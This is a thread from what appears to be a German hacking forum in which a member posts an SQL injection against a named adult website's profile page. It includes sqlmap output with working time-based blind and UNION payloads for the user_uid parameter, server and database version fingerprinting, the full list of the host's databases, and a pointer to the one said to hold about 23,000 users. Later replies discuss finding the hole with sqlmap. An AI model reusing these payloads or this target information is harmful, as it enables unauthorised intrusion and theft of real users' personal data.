Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLI] www.born-to-fuck.com

- - - - -

  • Bitte melde dich an um zu Antworten
2 Antworten in diesem Thema

#1
cooky1

cooky1

    Spic's Schützling

  • Premium Member
  • Likes
    79
  • 116 Beiträge
  • 564 Bedankt
  • verifiziert
Was erwartet Dich in unserem Club?

In unserem Club kannst du als User mit sexuell aufgeschlossenen Usern und Privatproduzenten chatten (natürlich auch direkt per Webcam) oder direkt per Privatnachricht mit Ihnen Kontakt aufnehmen, egal ob Männer, Frauen oder Paare - unsere Privatproduzenten laden täglich geile Bilderserien und Hadcorevideos auf Ihr Profil. Natürlich kannst auch Du Privatproduzent werden und Deine Bilderserien und geilen Videos zu Deinem eigenen Profil hinzufügen - und damit Geld verdienen.

 

-> eine tolle seite, wie ich finde :D
 


vuln: http://www.born-to-fuck.com/ProfilContent.php?user_uid=999999.9

Parameter: user_uid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: user_uid=999999.9' AND (SELECT * FROM (SELECT(SLEEP(5)))IgyI) AND '
iUlR'='iUlR

    Type: UNION query
    Title: MySQL UNION query (78) - 17 columns
    Payload: user_uid=999999.9' UNION ALL SELECT 78,78,78,78,78,78,78,78,78,78,7
8,CONCAT(0x716a626271,0x42654a425959764f4d55,0x716b707171),78,78,78,78,78#
---
[INFO] the back-end DBMS is MySQL
web server operating system: Linux SuSE 10.1
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL 5.0.12

Data Bases: 	information_schema
		Amateure_Test
		GEODB
		ballermann
		clubfantasy
		db_barverleih
		db_caribik
		db_caribik_chat
		db_caribik_neu
		db_club66
		db_decoflower
		db_gangbangclub
		db_girls
		db_herrinselina
		db_laufhaus_wn
		db_lustblick
		db_musikportal
		db_privatproduzent
		db_quad
		db_smaustria
		db_vorlage
		flatpreis
		funmotel
		galerie
		gangbangclub
		garry
		garry_webshop
		gb_videorudi
		ghi_data
		hr-data
		management
		massagestudio
		megamanele
		mysql
		newsletter_tracking
		pattayaroom
		privatdarsteller
		privateHomepageTest
		private_hot_girls
		privateonly
		privatproduzent
		privatproduzent_bak
		smb007
		star7
		test
		thailand
		tierarzt
		tmp
		video_loft
		videobereich
		videorudi
		webdesign
		webshop
		wpp


die 23k user dieser seite befinden sich in der db privatproduzent



.
  • smc2014 gefällt das

Thanked by 1 Member:
Sergejbekas

#2
Xenos88

Xenos88

    Hacker

  • Premium Member
  • Likes
    67
  • 151 Beiträge
  • 184 Bedankt

Haste per Hand oder per Tool die SQLI gefunden ?



#3
cooky1

cooky1

    Spic's Schützling

  • Premium Member
  • Likes
    79
  • 116 Beiträge
  • 564 Bedankt
  • verifiziert

die vuln per tool, die fertige sqli per sqlmap





  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 104 user(s)


    _)_, <cerrno>, 3rr0r!st, Anhed0nic, Ar@m!s, Arthurarsch, B1nary, b4dministrator, Backdoored, Becks, Benjiz, Benutzer, Beschorner89, Blower, blue_eyed_devil, Bornload, Bot4ng, breidi59, bumg2, Bypass, Caruso, Ch!ller, chick0n, chimchoca7, CocaCoala, cooky1, Crap, Cube, CyberFlash, Dark, Delta, dorf, dorich75, enjoy, eXact, Exynos, FatalityMods, fAYe, ferithan, Framerater, frechdax, funstyler, gtawelt, gutzuu, heckerhere, Hydra, Interimere, Irhabi, izibitzi, JohnDS, JohnJaztime, Kaban, keyb0ardz, kingkev0, Kiyoko, Kozuki, L0KK0, lNobodyl, loginman1, Lyrix, MarkSantos, MarkusxX, Mini Rick, mister-miyagi, most_uniQue, MrMongolo, mullman, nikita, Nissan300zx77, Norky, notfound, Osed28, pdr0, pekelhc, PHIPU, ponycrew, pornoralle, princearab, Qumbilo, R3s1stanc3, rat123, SavE1, schw3ngel, Sergejbekas, Silent0wn3r, smc2014, Smokyjoe, Stadt-Zofe, Syorack, SYS64738, t33t86, tingle, Toolbase, Twiy1, umarex, vital, wbx32, weedneger77, Xantar, Xenos88, xFAUSTx, zepsus, Zero-X, ZeroFreez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.